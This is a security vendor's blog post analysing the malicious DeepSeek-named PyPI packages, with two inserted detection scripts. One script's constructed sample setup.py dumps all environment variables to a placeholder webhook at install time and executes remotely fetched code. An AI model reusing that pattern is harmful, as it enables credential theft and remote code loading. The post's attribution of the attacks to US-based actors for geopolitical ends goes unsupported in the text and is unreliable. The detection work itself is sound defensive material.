Insights from the DeepSeek Malicious Software Package Incident: Why Software Supply Chain Security Matters in Global AI Technology Competition

February 11, 2025 | NSFOCUS

Background

With the widespread application of AI technology, software supply chains are facing more complex and diverse security threats. Since January 2025, DeepSeek, an emerging force in China's AI industry, has suffered a series of cyberattacks. According to analysis by NSFOCUS Security Lab, most of these attacks originate from IP addresses in the United States. Recently, the DeepSeek malicious software package incident on PyPI has brought software supply chain security back into focus.

This post analyzes the relationship between the DeepSeek attacks and software supply chain security, discusses the attack methods, the potential risks and the competition between countries, and proposes comprehensive countermeasures.

Software Supply Chain Attack Methods in DeepSeek Malware Package Incidents

The recent DeepSeek malware package incident on Python's official third-party repository, the Python Package Index (PyPI), is a typical software supply chain attack. Through careful planning, the attackers succeeded in implanting malicious code into target environments.

Counterfeit project name: The attacker uploaded malicious packages named “deepseek” and “deepseekai” to PyPI, imitating the well-known AI project DeepSeek through spelling variants of its name. This kind of counterfeiting easily misleads developers into downloading and using the packages, which is how the malicious packages enter the software supply chain.

Sensitive data theft: Once the malicious package is executed, it extracts sensitive data from the system's environment variables, such as cloud service API keys, database access credentials and SSH keys. This information is critical to the security of enterprise infrastructure; once leaked, attackers can directly and illegitimately access and control that infrastructure.

Covert data exfiltration: The attackers used the cloud integration platform Pipedream as a command and control (C2) node to exfiltrate the stolen data automatically and covertly. At the same time, the malicious code reserves an interface for loading remote malicious modules in preparation for lateral movement, through which the attacker can further expand the scope of the attack.
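As an added detection example (mine, not code from the post or from any NSFOCUS tool): a small static scanner that parses a package's Python source with the standard `ast` module and flags the three behaviours described above, namely reading the entire environment rather than one named variable, making outbound network calls, and executing or importing code that is not a literal in the file. The two input files are constructed stand-ins with a placeholder URL, and the indicator lists are assumptions chosen for this example; the scanner is meant for triaging an sdist before installation, with a `setup.py` that does this at top level being the worst case because it runs at install time.

```python
import ast
from dataclasses import dataclass, field

# Indicator lists (assumed for this example; extend them for your own review rules).
ENV_SOURCES = {"os.environ", "os.environb"}
NETWORK_CALLS = {
    "urllib.request.urlopen", "requests.get", "requests.post", "requests.put",
    "http.client.HTTPConnection", "http.client.HTTPSConnection", "socket.create_connection",
}
DYNAMIC_IMPORTS = {"__import__", "importlib.import_module"}


def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def reads_one_variable(parent, child):
    """os.environ['K'], os.environ.get('K') and 'K' in os.environ touch one variable, not all of them."""
    if isinstance(parent, ast.Subscript) and parent.value is child:
        return True
    if isinstance(parent, ast.Attribute) and parent.attr in {"get", "setdefault", "pop"}:
        return True
    return isinstance(parent, ast.Compare)


@dataclass
class Report:
    bulk_env: list = field(default_factory=list)      # lines that read the whole environment
    network: list = field(default_factory=list)       # (line, callee) outbound network calls
    dynamic_exec: list = field(default_factory=list)  # lines that exec/eval or import non-literal names

    def verdict(self) -> str:
        """Harvesting plus a channel out, or a channel plus dynamic code, is the pattern to stop on."""
        if self.network and (self.bulk_env or self.dynamic_exec):
            return "high"
        if self.bulk_env or self.dynamic_exec:
            return "medium"
        return "low"


def scan_source(src: str) -> Report:
    """Walk the AST once, recording each indicator with the line it occurs on."""
    rep = Report()
    tree = ast.parse(src)
    for parent in ast.walk(tree):
        for child in ast.iter_child_nodes(parent):
            if dotted(child) in ENV_SOURCES and not reads_one_variable(parent, child):
                rep.bulk_env.append(child.lineno)
        if isinstance(parent, ast.Call):
            callee = dotted(parent.func)
            if callee in NETWORK_CALLS:
                rep.network.append((parent.lineno, callee))
            elif callee in {"exec", "eval"} or (
                callee in DYNAMIC_IMPORTS and not all(isinstance(a, ast.Constant) for a in parent.args)
            ):
                rep.dynamic_exec.append(parent.lineno)
    rep.bulk_env = sorted(set(rep.bulk_env))
    rep.network.sort()
    rep.dynamic_exec = sorted(set(rep.dynamic_exec))
    return rep


# Constructed sample inputs: a setup.py showing the behaviour the post describes
# (placeholder URL, not a real endpoint) and a module that reads one variable legitimately.
SUSPICIOUS_SETUP = '''
import os, json, urllib.request
from setuptools import setup

def collect():
    # gathers every variable instead of the one it needs
    return json.dumps(dict(os.environ))

def report(payload):
    req = urllib.request.Request("https://PLACEHOLDER-webhook.example/hook", data=payload.encode())
    urllib.request.urlopen(req)

def load_extra(url):
    exec(urllib.request.urlopen(url).read())

report(collect())                      # runs at install time, before setup()
setup(name="deepseekai", version="0.0.1")
'''

BENIGN_MODULE = '''
import os, requests

def client():
    token = os.environ.get("DEEPSEEK_API_KEY")   # reads one named variable
    return requests.Session()
'''

if __name__ == "__main__":
    for label, src in (("suspicious setup.py", SUSPICIOUS_SETUP), ("benign module", BENIGN_MODULE)):
        r = scan_source(src)
        print(f"{label}: verdict={r.verdict()} bulk_env={r.bulk_env} network={r.network} dynamic={r.dynamic_exec}")
```

The "high" verdict is deliberately conservative: a package that reads one variable with `os.environ.get` and talks to its own API is ordinary, while one that serializes the whole environment and has any outbound call in the same file is worth a human look before it is installed anywhere.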

Malicious code developed with the help of AI tools: The malicious code contains a large number of detailed function-description comments, such as explanations of the data encryption logic and of the method used to traverse environment variables. This commenting style closely resembles code generated by AI programming assistants, suggesting that the attackers used AI tools to build the malicious payload quickly and to generate malicious code more efficiently.

Abnormal account behavior: The PyPI account bvk, which uploaded the malicious packages, had been inactive since its registration in June 2023 and suddenly became active shortly before the attack. This pattern of “low-reputation accounts publishing high-profile packages” is a typical feature of supply chain attacks. Many developers rushing to integrate with DeepSeek neglect to review the uploader's account history, giving such malicious packages an opening.

Security Threats and Risks of Software Supply Chain

The DeepSeek malware package incident is only the tip of the iceberg in software supply chain security; many more potential threats and risks exist.

The trust crisis in the open source ecosystem continues: Open source repositories such as PyPI and npm are infrastructure for software development, but their openness has led to a growing number of malicious packages. According to Sonatype statistics, the number of malicious packages on PyPI increased by 315% year-on-year in 2023. Typosquatting and dependency confusion are the mainstream attack techniques. In this incident, the deepseek and deepseekai packages misleading developers through spelling variants of the name is a textbook case of typosquatting.
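The checks a defender would want against the two techniques named here, and against the account-history signal described in the incident section above, pulled together as one added example (mine, not code from the post or from any NSFOCUS tool): a pre-install screening script that flags names within a small edit distance of a watched project (typosquatting, as with “deepseekai”), names that collide with an internal package (dependency confusion), and a brand-new package from an uploader account that registered long ago but never published anything. It generalizes beyond the single incident by taking a watch list, an allowlist and an internal-name list rather than hard-coding one name. The uploader name bvk and the June 2023 registration month come from the post; the watch list, allowlist, internal package name, release dates, the "today" date and the `PackageMeta` fields are constructed assumptions, not a PyPI API.

```python
import re
from dataclasses import dataclass
from datetime import date


def normalize(name: str) -> str:
    """PEP 503 normalization: lowercase, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two names; a small distance suggests a spelling variant."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


@dataclass
class PackageMeta:
    """Index metadata a reviewer pulls before installing (fields are assumed for this example)."""
    name: str
    first_release: date            # when the first version of this package appeared
    uploader: str
    uploader_registered: date      # when the uploader account was created
    uploader_prior_releases: int   # releases by that account before this package


def name_findings(name, watchlist, allowlist=frozenset(), internal=frozenset(), max_distance=2):
    """Flag impersonation of a watched project and collisions with internal package names."""
    n = normalize(name)
    if n in {normalize(a) for a in allowlist}:
        return []                                   # explicitly vetted by the team
    findings = []
    if n in {normalize(i) for i in internal}:
        findings.append(f"dependency-confusion: '{name}' collides with an internal package name")
    for brand in watchlist:
        b = normalize(brand)
        if n == b or levenshtein(n, b) <= max_distance or n.startswith(b + "-"):
            findings.append(f"impersonation: '{name}' matches or resembles watched project '{brand}'")
            break
    return findings


def account_findings(meta, today, new_package_days=30, dormant_days=365):
    """Flag the 'dormant account suddenly publishes a new package' pattern."""
    findings = []
    package_age = (today - meta.first_release).days
    if package_age <= new_package_days:
        findings.append(f"new-package: first release only {package_age} days ago")
    account_age = (today - meta.uploader_registered).days
    if account_age >= dormant_days and meta.uploader_prior_releases == 0:
        findings.append(f"dormant-account: '{meta.uploader}' registered {account_age} days ago with no prior releases")
    return findings


def screen(meta, today, watchlist, allowlist=frozenset(), internal=frozenset()):
    """Combine both checks; an empty list means nothing to review."""
    return name_findings(meta.name, watchlist, allowlist, internal) + account_findings(meta, today)


# Constructed sample data.  The uploader name and registration month are from the post;
# the release dates, the review date and the other packages are assumed.
WATCHLIST = {"deepseek"}
ALLOWLIST = {"requests"}
INTERNAL = {"acme-ml-utils"}
TODAY = date(2025, 2, 11)
SUSPICIOUS = PackageMeta("deepseekai", date(2025, 1, 29), "bvk", date(2023, 6, 1), 0)
BENIGN = PackageMeta("requests", date(2011, 2, 14), "long-time-maintainer", date(2010, 1, 1), 120)
CONFUSED = PackageMeta("acme_ml_utils", date(2025, 2, 1), "someone", date(2025, 1, 20), 0)

if __name__ == "__main__":
    for pkg in (SUSPICIOUS, BENIGN, CONFUSED):
        print(pkg.name, screen(pkg, TODAY, WATCHLIST, ALLOWLIST, INTERNAL) or "no findings")
```

The allowlist short-circuits the name checks only, not the account checks, so an allowlisted name uploaded from an unexpected dormant account still produces a finding; that is the case where a legitimate project's name has been taken over rather than imitated.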

Attack surface expansion and chain effect: Once malicious packages enter the software supply chain, they spread quickly, like a virus. Starting with individual developers, a malicious package may be introduced into a local environment because the dependency source was never verified; if it passes the enterprise's testing and reaches the production environment, it may leak the enterprise's core data; and when infected software is distributed to downstream users, the attack surface expands exponentially.

Escalation of AI-driven attack techniques: As AI technology develops, attackers have begun using AI to improve malware development efficiency and attack precision. In the DeepSeek attack, the attackers built the malicious payload quickly with the help of AI tools. In the future, attackers may use more sophisticated AI algorithms to find weak links in the software supply chain and to create stealthier, harder-to-detect malicious packages. The attack methods facing the software supply chain will become more complex and diverse, and traditional security protection measures may be overwhelmed.

Risks from a complex supply chain: Vulnerabilities may exist at every stage, from code development, open source component integration, testing and deployment to operations and maintenance (O&M). The developer of an open source component may inadvertently leave a security vulnerability that attackers exploit after the component is integrated into the enterprise's software. Because there are so many links, it is difficult to quickly locate and resolve problems once they occur, which increases the difficulty of security management.

Using the ATT&CK Framework to Analyze the Attack

The security threats and risks to the software supply chain described above have an impact that cannot be ignored, whether for enterprises or for countries. For enterprises, core data leakage may lead to theft of trade secrets, reputational damage, huge economic losses or even bankruptcy. At the national level, attacks on many enterprises may affect a country's overall competitiveness, especially in emerging technologies such as AI. Starting from the ATT&CK framework, an in-depth analysis of the strategy, tactics and techniques behind the DeepSeek attack helps in coping with software supply chain security challenges.

Strategic level: In the current international competitive landscape, AI has become a strategic high ground that countries compete for. The success of DeepSeek may change the distribution of global market share in the AI industry and affect the interests of the relevant enterprises. Attacking open source projects such as DeepSeek serves as a means to undermine China's technological rise and pricing power in the AI field.

Tactical level: The attackers combined a variety of software supply chain attack methods into a set of techniques: faking project names to attract developers' attention, stealing data to obtain valuable information, and using AI tools to develop malicious code more efficiently. These means attack the target from different angles, gradually breaking through the supply chain's line of defense to achieve the attackers' goal.

Technical level: The attackers took advantage of the trust mechanism of the open source ecosystem and the complexity of the software supply chain, carefully designing malicious packages to look like normal open source components and bypassing security checks by exploiting developers' trust in open source projects. At the same time, by using Pipedream as a C2 node to covertly send out the stolen data, and by reserving interfaces in the code for long-term persistence, they continuously damage DeepSeek and its related ecosystem.

Process level: Attackers are weaponizing three major features of the AI development process: strong dependence on open source components (80% of AI projects rely on third-party libraries), highly complex computing environments (hybrid cloud plus containerized deployment), and long data flow paths (from labeling to training to inference). This exposes traditional application security solutions to serious threats in AI supply chain scenarios.

This attack reflects the intense competition in cyberspace. Countries suppress enterprises of other countries through cyberattacks and other means to maintain their own advantages in AI technology, economic interests and international competitiveness. This not only affects the development of enterprises in various countries, but also has a far-reaching impact on the security landscape of the global software supply chain.

Summary

Without a credible software supply chain, there is no reliable new productivity.
In the new era in which AI defines productivity, software supply chain security has evolved from a technical issue into a matter of national security. Enterprises, industries and countries need to work together to build a comprehensive security governance system.

References

[1] NSFOCUS Fuying Lab. (2025). The Undercurrent Behind the Rise of DeepSeek: DDoS Attacks in the Global AI Technology Game.

[2] Saltzer, J. H., & Schroeder, M. D. (1975). The protection of information in computer systems. Proceedings of the IEEE.

[3] NIST. (2022). SP 800-161r1 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations.

[4] MITRE Corporation. (2023). MITRE ATT&CK Framework for Enterprise Environments.